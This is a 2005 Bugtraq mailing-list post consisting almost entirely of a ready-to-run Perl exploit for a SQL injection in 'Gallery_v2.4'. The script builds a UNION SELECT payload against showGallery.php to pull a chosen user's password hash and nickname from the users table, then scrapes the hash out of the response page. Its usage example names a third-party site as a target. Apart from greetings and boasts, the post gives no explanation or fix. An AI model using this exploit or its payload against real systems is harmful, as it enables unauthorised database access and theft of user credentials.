[41058] in bugtraq
Gallery_v2.4 SQL Injection
daemon@ATHENA.MIT.EDU (abducter_minds@yahoo.com)
Sat Nov 5 18:15:20 2005
Date: 4 Nov 2005 15:29:21 -0000
Message-ID: <20051104152921.6563.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: abducter_minds@yahoo.com
To: bugtraq@securityfocus.com
#!/bin/env perl
#------------------------------------------------------------#
#- Warning :- (ABDUCTER) Behind U BY (ABDUCTER_MINDS@S4A.CC) OR (ABDUCTER_MINDS@YAHOO.COM)
#- [!] ==|| Gallery_v2.4 SQL Injection ||==
#- Gr33tz :-
#- N0N0 (MY LOVE)
#- WWW.S4A.CC
#- Devil-00
#- FOR ALL ARABIAN COUNTRIES
#------------------------------------------------------------#
use LWP::Simple;
print "\n\n==========================================\n";
print "\n= Exploit for Gallery_v2.4 ";
print "\n= BY |(ABDUCTER_MINDS[at]YAHOO.COM)| ";
print "\n= FOR ALL ARAB WWW.S4A.CC ";
print "\n============================================\n\n";
if(!$ARGV[0] or !$ARGV[1]) {
print "\n==|| Warning ABDUCTER Behind U ||==";
print "\nUsage:\nperl $0 [host+script]\n\nExample:\nperl $0 http://tonioc.free.fr/gallery/ 1\n";
exit(0);
}
$url = "/showGallery.php?galid=-1%20UNION%20SELECT%20id,null,null,passw,null,nick,null,null,null,null,nick,null%20FROM%20users%20WHERE%20id=$ARGV[1]/*";
$page = get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page =~ m/<SPAN class="strong"><b>(.*?)<\/b>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);
